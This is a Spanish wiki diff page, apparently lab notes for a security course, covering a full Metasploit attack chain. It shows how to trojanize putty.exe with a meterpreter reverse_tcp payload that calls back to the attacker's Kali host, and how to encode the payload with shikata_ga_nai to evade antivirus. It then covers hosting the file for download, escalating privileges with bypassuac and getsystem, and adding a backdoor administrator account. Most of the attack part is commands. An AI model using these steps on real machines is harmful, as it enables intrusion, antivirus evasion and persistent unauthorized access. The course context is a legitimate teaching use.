Herramientas de usuario

Herramientas del sitio


sad:t2:m3

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anterior Revisión previa
Próxima revisión
Revisión previa
Próxima revisión Ambos lados, revisión siguiente
sad:t2:m3 [2018/11/21 18:38]
José Manuel Guallar
sad:t2:m3 [2019/01/04 13:18]
127.0.0.1 editor externo
Línea 59: Línea 59:
  
 <​code>​ <​code>​
-      ​cp putty.exe /​usr/​share/​metasploit-framework/​data/​templates/​ +cp putty.exe /​usr/​share/​metasploit-framework/​data/​templates/​ 
-      msfpayload windows/​meterpreter/​reverse_tcp LHOST=<​ip_del_kali>​ LPORT=4444 R | msfencode -t exe -x putty.exe -k -o bad_putty.exe -e x86/​shikata_ga_nai -c 3 +msfpayload windows/​meterpreter/​reverse_tcp LHOST=<​ip_del_kali>​ LPORT=4444 R | msfencode -t exe -x putty.exe -k -o bad_putty.exe -e x86/​shikata_ga_nai -c 3 
-      chmod 744 /​var/​www/​bad_putty.exe +chmod 744 /​var/​www/​bad_putty.exe 
-      ls -lrta | grep putty+ls -lrta | grep putty
 </​code>​ </​code>​
 +
 +El comando 1, ejecutables,​ como putty.exe, debe copiarse en el directorio /templates/ para codificarlo con msfencode.
 +
 +El comando 2, crea una puerta trasera reverse_tcp usando msfpayload para conectarse nuevamente a Kali (LHOST = ip_kali) por el puerto (LPORT = 4444). Se usa msfencode para enlazar la puerta trasera en putty.exe. Se utilizan ce 3 interacciones de codificación shikata_ga_nai (No hay mas remedio) para  evitar el antivirus de la máquina.
 +
 +Comando 3, hace ejecutable bad_putty.
 +    ​
  
 {{:​sad:​t2:​m3:​04.png?​600|}} {{:​sad:​t2:​m3:​04.png?​600|}}
 +
 +<​code>​
 +script msfconsole_putty.txt
 +</​code>​
 +
 +Hace un texto completo de la sesión terminal. Básicamente toda la entrada y la salida serán almacenadas en el archivo msfconsole_putty.txt. ​
 +
 {{:​sad:​t2:​m3:​05.png?​600|}} {{:​sad:​t2:​m3:​05.png?​600|}}
 +
 +<​code>​
 +msfconsole
 +</​code>​
 +
 {{:​sad:​t2:​m3:​06.png?​600|}} {{:​sad:​t2:​m3:​06.png?​600|}}
 +<​code>​
 +use exploit/​multi/​handler ​
 +set PAYLOAD windows/​meterpreter/​reverse_tcp ​
 +set LHOST <​ip_del_kali>​
 +set LPORT 4444 
 +exploit
 +</​code> ​
 {{:​sad:​t2:​m3:​07.png?​600|}} {{:​sad:​t2:​m3:​07.png?​600|}}
 +
 +Vamos al Windows 7, abrimos un explorador y escribimos la ip del kali
 +
 +<​code>​
 +http://​ip_del_Kali/​bad_putty.exe
 +</​code>​
 +
 +
 {{:​sad:​t2:​m3:​08.png?​600|}} {{:​sad:​t2:​m3:​08.png?​600|}}
 +
 +Ejecutamos el bad_putty
 +
 {{:​sad:​t2:​m3:​09.png?​600|}} {{:​sad:​t2:​m3:​09.png?​600|}}
 +Volvemos a la maquina virtual del Kali y se observa que el Meterpreter se ha actiado entre el Kali y el Windows vulnerable
 +
 {{:​sad:​t2:​m3:​10.png?​600|}} {{:​sad:​t2:​m3:​10.png?​600|}}
 +
 +
 +
 +
 {{:​sad:​t2:​m3:​11.png?​600|}} {{:​sad:​t2:​m3:​11.png?​600|}}
 +<​code>​
 +sysinfo
 +</​code>​
 +
 +
 {{:​sad:​t2:​m3:​12.png?​600|}} {{:​sad:​t2:​m3:​12.png?​600|}}
 +para saber el nombre de usuario escribimos ​
 +<​code>​
 +getuid
 +</​code>​
 {{:​sad:​t2:​m3:​13.png?​600|}} {{:​sad:​t2:​m3:​13.png?​600|}}
 +
 +<​code>​
 +shell
 +echo %username%
 +</​code>​
 +
 {{:​sad:​t2:​m3:​14.png?​600|}} {{:​sad:​t2:​m3:​14.png?​600|}}
 +
 +<​code>​
 +net users
 +</​code>​
 +
 {{:​sad:​t2:​m3:​15.png?​600|}} {{:​sad:​t2:​m3:​15.png?​600|}}
 +
 +<​code>​
 +net users student
 +</​code>​
 +Para poder ver con detalle la cuenta estudiante. se observa que es parte del grupo de administradores
 +
 {{:​sad:​t2:​m3:​16.png?​600|}} {{:​sad:​t2:​m3:​16.png?​600|}}
 +
 +<​code>​
 +net users nombre_hacker abc123 /ADD /​FULLNAME:"​Tu nombre"​
 +Observamos que nos pone Access denied.
 +exit
 +</​code>​
 +
 {{:​sad:​t2:​m3:​17.png?​600|}} {{:​sad:​t2:​m3:​17.png?​600|}}
 +<​code>​
 +background
 +sessions -l
 +</​code>​
 +comando 1 volvemos a la consola de Metasploit sin terminar la sesión
 +
 +comando 2 podemos ver todas las sesiones establecidas. Es un l de leon
 +
 {{:​sad:​t2:​m3:​18.png?​600|}} {{:​sad:​t2:​m3:​18.png?​600|}}
 +<​code>​
 +use exploit/​windows/​local/​bypassuac
 +show options
 +set SESSION 1
 +"​1"​ es el numero 1.
 +exploit
 +</​code>​
 +
 +comando 1 es un modulo de post-explosión que incrementa el control de la cuenta de usuario
 +
 {{:​sad:​t2:​m3:​19.png?​600|}} {{:​sad:​t2:​m3:​19.png?​600|}}
 +
 +
 +
 {{:​sad:​t2:​m3:​20.png?​600|}} {{:​sad:​t2:​m3:​20.png?​600|}}
 +
 +<​code>​
 +getuid
 +getsystem
 +getuid
 +</​code>​
 +
 +comando 1 proporciona el nombre de usuario "​estudiante"​
 +
 +comando 2 permite poner la cuenta de usuario como cuenta de administrador
 +
 +comando 3 el usuario ya es administrador privilegiado
 +
 {{:​sad:​t2:​m3:​21.png?​600|}} {{:​sad:​t2:​m3:​21.png?​600|}}
 +
 +<​code>​
 +shell
 +net users nombre_hacker abc123 /ADD /​FULLNAME:"​YOUR NAME"
 +reemplaza nombre_hacker por tu nombre
 +net localgroup Administrators nombre_hacker /ADD
 +net localgroup Administrators
 +</​code>​
 +
 +Se crea nombre_hacker con su contraseña
 +Muestra que usuarios pertenecen al grupo de Administradores. hombre_hacker pertenece ahora al grupo
 +
 {{:​sad:​t2:​m3:​22.png?​600|}} {{:​sad:​t2:​m3:​22.png?​600|}}
 +
 +Se sale del Meterpreter al sistema
 +
 {{:​sad:​t2:​m3:​23.png?​600|}} {{:​sad:​t2:​m3:​23.png?​600|}}
 +<​code>​
 +net users nombre_hacker
 +</​code>​
 +
 +Muestra los detalles de nombre_hacker
 {{:​sad:​t2:​m3:​24.png?​600|}} {{:​sad:​t2:​m3:​24.png?​600|}}
 {{:​sad:​t2:​m3:​25.png?​600|}} {{:​sad:​t2:​m3:​25.png?​600|}}
 +
 +Establecemos una sesión remota con el Windows 7
 +
 {{:​sad:​t2:​m3:​26.png?​600|}} {{:​sad:​t2:​m3:​26.png?​600|}}
 +<​code>​
 +cd /var/www
 +strings msfconsole_putty.txt | grep "​Meterpreter session 2"
 +strings msfconsole_putty.txt | grep "Full Name"
 +date
 +echo "tu nombre"​
 +</​code>​
sad/t2/m3.txt · Última modificación: 2019/12/04 18:45 por José Manuel Guallar